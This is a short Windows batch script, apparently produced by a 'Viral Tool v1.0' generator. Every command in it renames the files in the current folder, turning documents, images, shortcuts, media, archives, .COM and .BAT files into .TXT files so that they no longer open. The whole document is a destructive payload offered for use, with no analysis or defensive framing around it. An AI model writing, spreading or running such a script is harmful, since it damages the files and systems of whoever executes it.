:: Generated By Viral Tool v1.0
@echo off
::Change Files into a simple TXT
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
REN *.RTF *.TXT
REN *.BMP *.TXT
REN *.wav *.TXT
REN *.zip *.TXT
REN *.rar *.TXT
exit